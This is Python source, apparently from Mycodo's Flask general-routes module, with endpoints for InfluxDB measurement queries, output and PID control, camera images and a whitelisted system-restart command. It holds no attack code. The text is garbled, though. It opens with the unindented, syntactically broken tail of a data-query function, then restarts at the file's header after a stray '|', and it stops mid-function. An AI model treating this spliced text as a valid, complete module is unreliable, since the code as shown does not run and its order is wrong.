Return data from start_seconds to end_seconds from influxdb.
Used for asynchronous energy usage display of many points (up to millions).
"""
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
# Set the time frame to the past year if start/end not specified
if start_seconds == '0' and end_seconds == '0':
# Get how many points there are in the past year
query_str = query_string(
unit, device_id,
channel=channel,
value='COUNT')
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
channel=channel,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
first_point = raw_data['series'][0]['values'][0][0]
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
# Set the time frame to the past start epoch to now
elif start_seconds != '0' and end_seconds == '0':
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
first_point = raw_data['series'][0]['values'][0][0]
else:
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcfromtimestamp(float(end_seconds))
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
first_point = raw_data['series'][0]['values'][0][0]
start = datetime.datetime.strptime(
influx_time_str_to_milliseconds(first_point),
'%Y-%m-%dT%H:%M:%S.%f')
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
logger.debug('Count = {}'.format(count_points))
logger.debug('Start = {}'.format(start))
logger.debug('End = {}'.format(end))
# How many seconds between the start and end period
time_difference_seconds = (end - start).total_seconds()
logger.debug('Difference seconds = {}'.format(time_difference_seconds))
# If there are more than 700 points in the time frame, we need to group
# data points into 700 groups with points averaged in each group.
if count_points > 700:
# Average period between input reads
seconds_per_point = time_difference_seconds / count_points
logger.debug('Seconds per point = {}'.format(seconds_per_point))
# How many seconds to group data points in
group_seconds = int(time_difference_seconds / 700)
logger.debug('Group seconds = {}'.format(group_seconds))
try:
query_str = query_string(
unit, device_id,
channel=channel,
value='MEAN',
start_str=start_str,
end_str=end_str,
group_sec=group_seconds)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
return jsonify(raw_data['series'][0]['values'])
except Exception as e:
logger.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
query_str = query_string(
unit, device_id,
channel=channel,
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
return jsonify(raw_data['series'][0]['values'])
except Exception as e:
logger.error("URL for 'async_usage' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/output_mod/<output_id>/<channel>/<state>/<output_type>/<amount>')
@flask_login.login_required
def output_mod(output_id, channel, state, output_type, amount):
    """ Manipulate output (using non-unique ID)

    :param output_id: ID of the output to control
    :param channel: output channel number (int) or an OutputChannel unique ID
    :param state: 'on' or 'off'
    :param output_type: 'sec', 'pwm', 'vol', or 'value'
    :param amount: numeric amount (must be >= 0 for 'sec'/'pwm')
    :return: plain-text status string ('SUCCESS: ...' or 'ERROR: ...')
    """
    if not utils_general.user_has_permission('edit_controllers'):
        return 'Insufficient user permissions to manipulate outputs'

    if is_int(channel):
        # if an integer was returned
        output_channel = int(channel)
    else:
        # if a channel ID was returned, resolve it to a channel number
        channel_dev = db_retrieve_table(OutputChannel).filter(
            OutputChannel.unique_id == channel).first()
        if channel_dev:
            output_channel = channel_dev.channel
        else:
            return "Could not determine channel number from channel ID '{}'".format(channel)

    daemon = DaemonControl()
    # Only accept on/off with a numeric amount; sec/pwm additionally require
    # a non-negative amount, while vol/value accept any float.
    if (state in ['on', 'off'] and str_is_float(amount) and
            (
                (output_type in ['sec', 'pwm'] and float(amount) >= 0) or
                output_type == 'vol' or
                output_type == 'value'
            )):
        out_status = daemon.output_on_off(
            output_id,
            state,
            output_type=output_type,
            amount=float(amount),
            output_channel=output_channel)
        # out_status is (error_flag, message) from the daemon
        if out_status[0]:
            return 'ERROR: {}'.format(out_status[1])
        else:
            return 'SUCCESS: {}'.format(out_status[1])
    else:
        return 'ERROR: unknown parameters: ' \
               'output_id: {}, channel: {}, state: {}, output_type: {}, amount: {}'.format(
                   output_id, channel, state, output_type, amount)
@blueprint.route('/daemonactive')
@flask_login.login_required
def daemon_active():
    """Query the daemon for its status; respond '0' if it cannot be reached."""
    try:
        return DaemonControl().daemon_status()
    except Exception as e:
        logger.error(
            "URL for 'daemon_active' raised and error: {err}".format(err=e))
    return '0'
@blueprint.route('/systemctl/<action>')
@flask_login.login_required
def computer_command(action):
    """Execute one of several commands as root

    The action is validated against a fixed whitelist before it is ever
    interpolated into a shell command, so arbitrary command injection via
    the URL is not possible.
    """
    if not utils_general.user_has_permission('edit_settings'):
        return redirect(url_for('routes_general.home'))

    try:
        # Whitelist check: reject anything that isn't a known action
        if action not in ['restart', 'shutdown', 'daemon_restart', 'frontend_reload']:
            flash("Unrecognized command: {action}".format(
                action=action), "success")
            return redirect('/settings')
        if DOCKER_CONTAINER:
            # Inside Docker only daemon/frontend restarts are supported
            if action == 'daemon_restart':
                control = DaemonControl()
                control.terminate_daemon()
                flash(gettext("Command to restart the daemon sent"), "success")
            elif action == 'frontend_reload':
                subprocess.Popen('docker restart mycodo_flask 2>&1', shell=True)
                flash(gettext("Command to reload the frontend sent"), "success")
        else:
            # Non-Docker: delegate to the setuid wrapper script. 'action' was
            # whitelisted above, so the interpolation is safe.
            cmd = '{path}/mycodo/scripts/mycodo_wrapper {action} 2>&1'.format(
                path=INSTALL_DIRECTORY, action=action)
            subprocess.Popen(cmd, shell=True)
            if action == 'restart':
                flash(gettext("System rebooting in 10 seconds"), "success")
            elif action == 'shutdown':
                flash(gettext("System shutting down in 10 seconds"), "success")
            elif action == 'daemon_restart':
                flash(gettext("Command to restart the daemon sent"), "success")
            elif action == 'frontend_reload':
                flash(gettext("Command to reload the frontend sent"), "success")
        return redirect('/settings')
    except Exception as e:
        logger.error("System command '{cmd}' raised and error: "
                     "{err}".format(cmd=action, err=e))
        flash("System command '{cmd}' raised and error: "
              "{err}".format(cmd=action, err=e), "error")
        return redirect(url_for('routes_general.home'))
#
# PID Dashboard object routes
#
def return_point_timestamp(dev_id, unit, period, measurement=None, channel=None):
    """Fetch the most recent [epoch_ms, value] pair for a measurement.

    Queries influxdb for the LAST value within the past `period` seconds.
    Returns [None, None] when the query cannot be built or yields no data.
    """
    client = InfluxDBClient(
        INFLUXDB_HOST, INFLUXDB_PORT, INFLUXDB_USER,
        INFLUXDB_PASSWORD, INFLUXDB_DATABASE)
    query = query_string(
        unit, dev_id,
        measure=measurement, channel=channel,
        value='LAST', past_sec=period)
    if query == 1:
        return [None, None]
    try:
        points = client.query(query).raw['series'][0]['values']
        last_time = points[-1][0]
        last_value = '{:.3f}'.format(float(points[-1][1]))
        # Converting the date-time string to epoch ms can be slow for bulk use
        epoch_ms = calendar.timegm(date_parse(last_time).timetuple()) * 1000
        return [epoch_ms, last_value]
    except Exception:
        return [None, None]
@blueprint.route('/last_pid/<pid_id>/<input_period>')
@flask_login.login_required
def last_data_pid(pid_id, input_period):
    """Return the most recent time and value from influxdb

    Builds a JSON payload with the PID controller's live state plus the
    latest setpoint, P/I/D terms, duration, duty cycle, and measured value.
    Responds 204 on bad input or when no data is available.
    """
    if not str_is_float(input_period):
        return '', 204

    try:
        pid = PID.query.filter(PID.unique_id == pid_id).first()

        # pid.measurement is stored as 'device_id,measurement_id'
        if len(pid.measurement.split(',')) == 2:
            device_id = pid.measurement.split(',')[0]
            measurement_id = pid.measurement.split(',')[1]
        else:
            device_id = None
            measurement_id = None

        actual_measurement = DeviceMeasurements.query.filter(
            DeviceMeasurements.unique_id == measurement_id).first()
        if actual_measurement:
            actual_conversion = Conversion.query.filter(
                Conversion.unique_id == actual_measurement.conversion_id).first()
        else:
            actual_conversion = None
        (actual_channel,
         actual_unit,
         actual_measurement) = return_measurement_info(
            actual_measurement, actual_conversion)

        # Determine the unit of the setpoint from the measured quantity
        setpoint_unit = None
        if pid and ',' in pid.measurement:
            pid_measurement = pid.measurement.split(',')[1]
            setpoint_measurement = DeviceMeasurements.query.filter(
                DeviceMeasurements.unique_id == pid_measurement).first()
            if setpoint_measurement:
                conversion = Conversion.query.filter(
                    Conversion.unique_id == setpoint_measurement.conversion_id).first()
                _, setpoint_unit, _ = return_measurement_info(setpoint_measurement, conversion)

        p_value = return_point_timestamp(
            pid_id, 'pid_value', input_period, measurement='pid_p_value')
        i_value = return_point_timestamp(
            pid_id, 'pid_value', input_period, measurement='pid_i_value')
        d_value = return_point_timestamp(
            pid_id, 'pid_value', input_period, measurement='pid_d_value')
        # Total PID output is only computed when all three terms are present
        if None not in (p_value[1], i_value[1], d_value[1]):
            pid_value = [p_value[0], '{:.3f}'.format(float(p_value[1]) + float(i_value[1]) + float(d_value[1]))]
        else:
            pid_value = None

        setpoint_band = None
        if pid.band:
            try:
                daemon = DaemonControl()
                setpoint_band = daemon.pid_get(pid.unique_id, 'setpoint_band')
            except:
                # Best effort: leave setpoint_band as None if the daemon is down
                logger.debug("Couldn't get setpoint")

        live_data = {
            'activated': pid.is_activated,
            'paused': pid.is_paused,
            'held': pid.is_held,
            'setpoint': return_point_timestamp(
                pid_id, setpoint_unit, input_period, channel=0),
            'setpoint_band': setpoint_band,
            'pid_p_value': p_value,
            'pid_i_value': i_value,
            'pid_d_value': d_value,
            'pid_pid_value': pid_value,
            'duration_time': return_point_timestamp(
                pid_id, 's', input_period, measurement='duration_time'),
            'duty_cycle': return_point_timestamp(
                pid_id, 'percent', input_period, measurement='duty_cycle'),
            'actual': return_point_timestamp(
                device_id,
                actual_unit,
                input_period,
                measurement=actual_measurement,
                channel=actual_channel)
        }
        return jsonify(live_data)
    except KeyError:
        logger.debug("No Data returned form influxdb")
        return '', 204
    except Exception as e:
        logger.exception("URL for 'last_pid' raised and error: "
                         "{err}".format(err=e))
        return '', 204
@blueprint.route('/pid_mod_unique_id/<unique_id>/<state>')
@flask_login.login_required
def pid_mod_unique_id(unique_id, state):
    """ Manipulate a PID controller (using unique ID)

    :param unique_id: unique ID of the PID controller
    :param state: one of 'activate_pid', 'deactivate_pid', 'pause_pid',
        'hold_pid', 'resume_pid', or 'set_setpoint_pid|<value>'
    :return: status string describing the result of the action
    """
    if not utils_general.user_has_permission('edit_controllers'):
        return 'Insufficient user permissions to manipulate PID'

    pid = PID.query.filter(PID.unique_id == unique_id).first()
    # Guard: an unknown ID would otherwise raise AttributeError below
    if not pid:
        return "PID not found with ID '{}'".format(unique_id)
    daemon = DaemonControl()

    if state == 'activate_pid':
        pid.is_activated = True
        pid.save()
        _, return_str = daemon.controller_activate(pid.unique_id)
        return return_str
    elif state == 'deactivate_pid':
        pid.is_activated = False
        pid.is_paused = False
        pid.is_held = False
        pid.save()
        _, return_str = daemon.controller_deactivate(pid.unique_id)
        return return_str
    elif state == 'pause_pid':
        pid.is_paused = True
        pid.save()
        # Only signal the daemon when the controller is actually running
        if pid.is_activated:
            return_str = daemon.pid_pause(pid.unique_id)
        else:
            return_str = "PID Paused (Note: PID is not currently active)"
        return return_str
    elif state == 'hold_pid':
        pid.is_held = True
        pid.save()
        if pid.is_activated:
            return_str = daemon.pid_hold(pid.unique_id)
        else:
            return_str = "PID Held (Note: PID is not currently active)"
        return return_str
    elif state == 'resume_pid':
        pid.is_held = False
        pid.is_paused = False
        pid.save()
        if pid.is_activated:
            return_str = daemon.pid_resume(pid.unique_id)
        else:
            return_str = "PID Resumed (Note: PID is not currently active)"
        return return_str
    elif 'set_setpoint_pid' in state:
        # state is formatted 'set_setpoint_pid|<value>'
        pid.setpoint = state.split('|')[1]
        pid.save()
        if pid.is_activated:
            return_str = daemon.pid_set(pid.unique_id, 'setpoint', float(state.split('|')[1]))
        else:
            return_str = "PID Setpoint changed (Note: PID is not currently active)"
        return return_str
    # Previously fell off the end for unknown states, returning None and
    # causing Flask to respond with HTTP 500. Return an explicit message.
    return "Unrecognized state: '{}'".format(state)
# import flask_login
# from mycodo.mycodo_flask.api import api
# @blueprint.route('/export_swagger')
# @flask_login.login_required
# def export_swagger():
# """Export swagger JSON to swagger.json file"""
# from mycodo.mycodo_flask.utils import utils_general
# import json
# if not utils_general.user_has_permission('view_settings'):
# return 'You do not have permission to access this.', 401
# with open("/home/pi/swagger.json", "w") as text_file:
# text_file.write(json.dumps(api.__schema__, indent=2))
# return 'success'
| # coding=utf-8
import calendar
import datetime
import logging
import subprocess
import time
from importlib import import_module
import flask_login
import os
from dateutil.parser import parse as date_parse
from flask import Response
from flask import flash
from flask import jsonify
from flask import redirect
from flask import send_file
from flask import send_from_directory
from flask import url_for
from flask.blueprints import Blueprint
from flask_babel import gettext
from flask_limiter import Limiter
from influxdb import InfluxDBClient
from sqlalchemy import and_
from mycodo.config import DOCKER_CONTAINER
from mycodo.config import INFLUXDB_DATABASE
from mycodo.config import INFLUXDB_HOST
from mycodo.config import INFLUXDB_PASSWORD
from mycodo.config import INFLUXDB_PORT
from mycodo.config import INFLUXDB_USER
from mycodo.config import INSTALL_DIRECTORY
from mycodo.config import LOG_PATH
from mycodo.config import PATH_CAMERAS
from mycodo.config import PATH_NOTE_ATTACHMENTS
from mycodo.databases.models import Camera
from mycodo.databases.models import Conversion
from mycodo.databases.models import DeviceMeasurements
from mycodo.databases.models import Input
from mycodo.databases.models import Math
from mycodo.databases.models import NoteTags
from mycodo.databases.models import Notes
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models import PID
from mycodo.devices.camera import camera_record
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.routes_authentication import clear_cookie_auth
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_general import get_ip_address
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
from mycodo.utils.database import db_retrieve_table
from mycodo.utils.image import generate_thermal_image_from_pixels
from mycodo.utils.influx import influx_time_str_to_milliseconds
from mycodo.utils.influx import query_string
from mycodo.utils.system_pi import assure_path_exists
from mycodo.utils.system_pi import is_int
from mycodo.utils.system_pi import return_measurement_info
from mycodo.utils.system_pi import str_is_float
# Blueprint serving the general (non-page) routes; static/template folders
# are resolved relative to this package's parent directory.
blueprint = Blueprint('routes_general',
                      __name__,
                      static_folder='../static',
                      template_folder='../templates')
# Module-level logger, named after this module
logger = logging.getLogger(__name__)
# Rate limiter keyed by the requesting client's IP address
limiter = Limiter(key_func=get_ip_address)
@blueprint.route('/')
def home():
    """Redirect to the user's configured landing page (Live by default)."""
    landing_routes = {
        'live': 'routes_page.page_live',
        'dashboard': 'routes_dashboard.page_dashboard_default',
        'info': 'routes_page.page_info',
    }
    try:
        user = flask_login.current_user
        if user.is_authenticated:
            endpoint = landing_routes.get(user.landing_page)
            if endpoint:
                return redirect(url_for(endpoint))
        return redirect(url_for('routes_page.page_live'))
    except:
        logger.error("User may not be logged in. Clearing cookie auth.")
        return clear_cookie_auth()
@blueprint.route('/index_page')
def index_page():
    """Redirect to the user's configured index page (Live by default)."""
    index_routes = {
        'live': 'routes_page.page_live',
        'dashboard': 'routes_dashboard.page_dashboard_default',
        'info': 'routes_page.page_info',
    }
    try:
        user = flask_login.current_user
        # An unset index page or the 'landing' sentinel defers to home()
        if not user.index_page or user.index_page == 'landing':
            return home()
        if user.is_authenticated:
            endpoint = index_routes.get(user.index_page)
            if endpoint:
                return redirect(url_for(endpoint))
        return redirect(url_for('routes_page.page_live'))
    except:
        logger.error("User may not be logged in. Clearing cookie auth.")
        return clear_cookie_auth()
@blueprint.route('/settings', methods=('GET', 'POST'))
@flask_login.login_required
def page_settings():
    """Redirect the bare /settings URL to the General settings page."""
    return redirect('settings/general')
@blueprint.route('/note_attachment/<filename>')
@flask_login.login_required
def send_note_attachment(filename):
    """Return a file from the note attachment directory

    The resolved absolute path must remain inside PATH_NOTE_ATTACHMENTS;
    traversal attempts (e.g. '../') or unknown files yield a 404.
    """
    file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)
    try:
        # Compare against the directory path plus a trailing separator so a
        # sibling directory sharing the same prefix cannot slip through
        # (plain startswith(PATH_NOTE_ATTACHMENTS) would accept it).
        base_dir = os.path.abspath(PATH_NOTE_ATTACHMENTS)
        if os.path.abspath(file_path).startswith(base_dir + os.sep):
            return send_file(file_path, as_attachment=True)
    except Exception:
        logger.exception("Send note attachment")
    # Explicit response instead of implicitly returning None (HTTP 500)
    return 'Attachment not found', 404
@blueprint.route('/camera/<camera_unique_id>/<img_type>/<filename>')
@flask_login.login_required
def camera_img_return_path(camera_unique_id, img_type, filename):
    """Return an image from stills or time-lapses

    filename is only served when it appears in a directory listing of the
    resolved camera path, so arbitrary paths cannot be requested.
    """
    camera = Camera.query.filter(Camera.unique_id == camera_unique_id).first()
    camera_path = assure_path_exists(
        os.path.join(PATH_CAMERAS, '{uid}'.format(uid=camera.unique_id)))
    if img_type == 'still':
        # Prefer the user-configured still path, else the default subdirectory
        if camera.path_still:
            path = camera.path_still
        else:
            path = os.path.join(camera_path, img_type)
    elif img_type == 'timelapse':
        if camera.path_timelapse:
            path = camera.path_timelapse
        else:
            path = os.path.join(camera_path, img_type)
    else:
        return "Unknown Image Type"

    if os.path.isdir(path):
        # Generator of regular files directly inside the image directory
        files = (files for files in os.listdir(path)
                 if os.path.isfile(os.path.join(path, files)))
    else:
        files = []
    # Membership in the listing guarantees the file lives inside 'path'
    if filename in files:
        path_file = os.path.join(path, filename)
        if os.path.abspath(path_file).startswith(path):
            return send_file(path_file, mimetype='image/jpeg')

    return "Image not found"
@blueprint.route('/camera_acquire_image/<image_type>/<camera_unique_id>/<max_age>')
@flask_login.login_required
def camera_img_acquire(image_type, camera_unique_id, max_age):
    """Capture an image and return the filename

    :param image_type: 'new' for a fresh uniquely-named image, 'tmp' to
        overwrite a per-camera temporary file
    :param max_age: maximum allowed age of the captured image, in seconds
    :return: JSON-style string '["<filename>","<datetime>"]' or
        '["max_age_exceeded"]'
    """
    if image_type == 'new':
        tmp_filename = None
    elif image_type == 'tmp':
        tmp_filename = '{id}_tmp.jpg'.format(id=camera_unique_id)
    else:
        # Unknown image_type: implicit None response
        return
    path, filename = camera_record('photo', camera_unique_id, tmp_filename=tmp_filename)
    image_path = os.path.join(path, filename)
    time_max_age = datetime.datetime.now() - datetime.timedelta(seconds=int(max_age))
    # Use the file's creation time to check the image isn't stale
    timestamp = os.path.getctime(image_path)
    if datetime.datetime.fromtimestamp(timestamp) > time_max_age:
        date_time = datetime.datetime.fromtimestamp(timestamp).strftime('%Y-%m-%d %H:%M:%S')
        return_values = '["{}","{}"]'.format(filename, date_time)
    else:
        return_values = '["max_age_exceeded"]'
    return Response(return_values, mimetype='text/json')
@blueprint.route('/camera_latest_timelapse/<camera_unique_id>/<max_age>')
@flask_login.login_required
def camera_img_latest_timelapse(camera_unique_id, max_age):
    """Capture an image and/or return a filename

    Returns the latest time-lapse filename and timestamp as a JSON-style
    string, or '["max_age_exceeded"]' / '["file_not_found"]' accordingly.
    """
    camera = Camera.query.filter(
        Camera.unique_id == camera_unique_id).first()
    _, tl_path = utils_general.get_camera_paths(camera)
    timelapse_file_path = os.path.join(tl_path, str(camera.timelapse_last_file))
    if camera.timelapse_last_file is not None and os.path.exists(timelapse_file_path):
        # Only return the file if its recorded timestamp is newer than max_age
        time_max_age = datetime.datetime.now() - datetime.timedelta(seconds=int(max_age))
        if datetime.datetime.fromtimestamp(camera.timelapse_last_ts) > time_max_age:
            ts = datetime.datetime.fromtimestamp(camera.timelapse_last_ts).strftime("%Y-%m-%d %H:%M:%S")
            return_values = '["{}","{}"]'.format(camera.timelapse_last_file, ts)
        else:
            return_values = '["max_age_exceeded"]'
    else:
        return_values = '["file_not_found"]'
    return Response(return_values, mimetype='text/json')
def gen(camera):
    """Yield an endless stream of multipart MJPEG frames from *camera*."""
    boundary = b'--frame\r\nContent-Type: image/jpeg\r\n\r\n'
    while True:
        yield boundary + camera.get_frame() + b'\r\n'
@blueprint.route('/video_feed/<unique_id>')
@flask_login.login_required
def video_feed(unique_id):
    """Video streaming route. Put this in the src attribute of an img tag."""
    camera_options = Camera.query.filter(Camera.unique_id == unique_id).first()
    # Dynamically import the camera backend module matching the configured library
    camera_stream = import_module('mycodo.mycodo_flask.camera.camera_' + camera_options.library).Camera
    camera_stream.set_camera_options(camera_options)
    # Stream frames as a multipart MJPEG response
    return Response(gen(camera_stream(unique_id=unique_id)),
                    mimetype='multipart/x-mixed-replace; boundary=frame')
@blueprint.route('/outputstate')
@flask_login.login_required
def gpio_state():
    """Return the states of every output as JSON."""
    states = get_all_output_states()
    return jsonify(states)
@blueprint.route('/outputstate_unique_id/<unique_id>/<channel_id>')
@flask_login.login_required
def gpio_state_unique_id(unique_id, channel_id):
    """Return the GPIO state, for dashboard output """
    channel = OutputChannel.query.filter(OutputChannel.unique_id == channel_id).first()
    daemon_control = DaemonControl()
    # NOTE(review): channel is None when channel_id is unknown, which would
    # raise AttributeError on channel.channel — confirm callers always pass
    # a valid OutputChannel unique ID.
    state = daemon_control.output_state(unique_id, channel.channel)
    return jsonify(state)
@blueprint.route('/widget_execute/<unique_id>')
@flask_login.login_required
def widget_execute(unique_id):
    """Run a widget's code via the daemon and return its response as JSON."""
    response = DaemonControl().widget_execute(unique_id)
    return jsonify(response)
@blueprint.route('/time')
@flask_login.login_required
def get_time():
    """ Return the current local time formatted as 'MM/DD HH:MM' """
    now = datetime.datetime.now()
    return jsonify(now.strftime('%m/%d %H:%M'))
@blueprint.route('/dl/<dl_type>/<path:filename>')
@flask_login.login_required
def download_file(dl_type, filename):
    """Serve log file to download"""
    # Only the 'log' download type is supported; anything else gets 204
    if dl_type != 'log':
        return '', 204
    return send_from_directory(LOG_PATH, filename, as_attachment=True)
@blueprint.route('/last/<unique_id>/<measure_type>/<measurement_id>/<period>')
@flask_login.login_required
def last_data(unique_id, measure_type, measurement_id, period):
    """Return the most recent time and value from influxdb

    Responds with '[epoch_ms,value]' as text/json, or 204 when the period is
    invalid, the query fails, or no data exists.
    NOTE(review): if measure_type is not in the accepted list the function
    falls through and returns None (HTTP 500) — confirm callers only send
    the listed types.
    """
    if not str_is_float(period):
        return '', 204

    if measure_type in ['input', 'math', 'function', 'output', 'pid']:
        dbcon = InfluxDBClient(
            INFLUXDB_HOST,
            INFLUXDB_PORT,
            INFLUXDB_USER,
            INFLUXDB_PASSWORD,
            INFLUXDB_DATABASE)

        if measure_type in ['input', 'math', 'function', 'output', 'pid']:
            measure = DeviceMeasurements.query.filter(
                DeviceMeasurements.unique_id == measurement_id).first()
        else:
            return '', 204

        if measure:
            conversion = Conversion.query.filter(
                Conversion.unique_id == measure.conversion_id).first()
        else:
            conversion = None
        channel, unit, measurement = return_measurement_info(
            measure, conversion)

        # Setpoint measurements inherit unit/measurement from the PID's
        # measured quantity
        if hasattr(measure, 'measurement_type') and measure.measurement_type == 'setpoint':
            setpoint_pid = PID.query.filter(PID.unique_id == measure.device_id).first()
            if setpoint_pid and ',' in setpoint_pid.measurement:
                pid_measurement = setpoint_pid.measurement.split(',')[1]
                setpoint_measurement = DeviceMeasurements.query.filter(
                    DeviceMeasurements.unique_id == pid_measurement).first()
                if setpoint_measurement:
                    conversion = Conversion.query.filter(
                        Conversion.unique_id == setpoint_measurement.conversion_id).first()
                    _, unit, measurement = return_measurement_info(setpoint_measurement, conversion)

        try:
            # period == '0' means no time bound: take the overall LAST value
            if period != '0':
                query_str = query_string(
                    unit, unique_id,
                    measure=measurement, channel=channel,
                    value='LAST', past_sec=period)
            else:
                query_str = query_string(
                    unit, unique_id,
                    measure=measurement, channel=channel,
                    value='LAST')
            if query_str == 1:
                return '', 204
            raw_data = dbcon.query(query_str).raw
            number = len(raw_data['series'][0]['values'])
            time_raw = raw_data['series'][0]['values'][number - 1][0]
            value = raw_data['series'][0]['values'][number - 1][1]
            value = float(value)
            # Convert date-time to epoch (potential bottleneck for data)
            dt = date_parse(time_raw)
            timestamp = calendar.timegm(dt.timetuple()) * 1000
            live_data = '[{},{}]'.format(timestamp, value)
            return Response(live_data, mimetype='text/json')
        except KeyError:
            logger.debug("No Data returned form influxdb")
            return '', 204
        except IndexError:
            logger.debug("No Data returned form influxdb")
            return '', 204
        except Exception as e:
            logger.exception("URL for 'last_data' raised and error: "
                             "{err}".format(err=e))
            return '', 204
@blueprint.route('/past/<unique_id>/<measure_type>/<measurement_id>/<past_seconds>')
@flask_login.login_required
def past_data(unique_id, measure_type, measurement_id, past_seconds):
    """Return data from past_seconds until present from influxdb

    For measure_type 'tag' the data comes from the Notes table; for the
    other types it is queried from influxdb. Responds 204 when no data.
    """
    if not str_is_float(past_seconds):
        return '', 204

    if measure_type == 'tag':
        notes_list = []
        tag = NoteTags.query.filter(NoteTags.unique_id == unique_id).first()
        notes = Notes.query.filter(
            Notes.date_time >= (datetime.datetime.utcnow() - datetime.timedelta(seconds=int(past_seconds)))).all()
        for each_note in notes:
            # Notes store their tag IDs as a comma-separated string
            if tag.unique_id in each_note.tags.split(','):
                notes_list.append(
                    [each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
        if notes_list:
            return jsonify(notes_list)
        else:
            return '', 204
    elif measure_type in ['input', 'math', 'function', 'output', 'pid']:
        dbcon = InfluxDBClient(
            INFLUXDB_HOST,
            INFLUXDB_PORT,
            INFLUXDB_USER,
            INFLUXDB_PASSWORD,
            INFLUXDB_DATABASE)
        if measure_type in ['input', 'math', 'function', 'output', 'pid']:
            measure = DeviceMeasurements.query.filter(
                DeviceMeasurements.unique_id == measurement_id).first()
        else:
            measure = None
        if not measure:
            return "Could not find measurement"
        if measure:
            conversion = Conversion.query.filter(
                Conversion.unique_id == measure.conversion_id).first()
        else:
            conversion = None
        channel, unit, measurement = return_measurement_info(
            measure, conversion)

        # Setpoint measurements inherit unit/measurement from the PID's
        # measured quantity
        if hasattr(measure, 'measurement_type') and measure.measurement_type == 'setpoint':
            setpoint_pid = PID.query.filter(PID.unique_id == measure.device_id).first()
            if setpoint_pid and ',' in setpoint_pid.measurement:
                pid_measurement = setpoint_pid.measurement.split(',')[1]
                setpoint_measurement = DeviceMeasurements.query.filter(
                    DeviceMeasurements.unique_id == pid_measurement).first()
                if setpoint_measurement:
                    conversion = Conversion.query.filter(
                        Conversion.unique_id == setpoint_measurement.conversion_id).first()
                    _, unit, measurement = return_measurement_info(setpoint_measurement, conversion)

        try:
            query_str = query_string(
                unit, unique_id,
                measure=measurement,
                channel=channel,
                past_sec=past_seconds)
            if query_str == 1:
                return '', 204
            raw_data = dbcon.query(query_str).raw
            if 'series' in raw_data and raw_data['series']:
                return jsonify(raw_data['series'][0]['values'])
            else:
                return '', 204
        except Exception as e:
            logger.debug("URL for 'past_data' raised and error: "
                         "{err}".format(err=e))
            return '', 204
@blueprint.route('/generate_thermal_image/<unique_id>/<timestamp>')
@flask_login.login_required
def generate_thermal_image_from_timestamp(unique_id, timestamp):
    """Generate and return a thermal image from influxdb pixel data.

    Queries one value per input channel within the one-second window around
    `timestamp` (epoch milliseconds), renders an 8x8 thermal image, and
    serves it as JPEG.
    """
    ts_now = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
    camera_path = assure_path_exists(
        os.path.join(PATH_CAMERAS, '{uid}'.format(uid=unique_id)))
    filename = 'Still-{uid}-{ts}.jpg'.format(
        uid=unique_id,
        ts=ts_now).replace(" ", "_")
    save_path = assure_path_exists(os.path.join(camera_path, 'thermal'))
    assure_path_exists(save_path)
    path_file = os.path.join(save_path, filename)

    dbcon = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)
    input_dev = Input.query.filter(Input.unique_id == unique_id).first()
    pixels = []
    success = True

    # Bound the query to the one-second window containing the timestamp
    start = int(int(timestamp) / 1000.0)  # Round down
    end = start + 1  # Round up

    start_timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(start))
    end_timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(end))

    # One influxdb query per pixel channel of the input device
    for each_channel in range(input_dev.channels):
        measurement = 'channel_{chan}'.format(
            chan=each_channel)
        query_str = query_string(measurement, unique_id,
                                 start_str=start_timestamp,
                                 end_str=end_timestamp)
        if query_str == 1:
            logger.error('Invalid query string')
            success = False
        else:
            raw_data = dbcon.query(query_str).raw
            if not raw_data or 'series' not in raw_data or not raw_data['series']:
                logger.error('No measurements to export in this time period')
                success = False
            else:
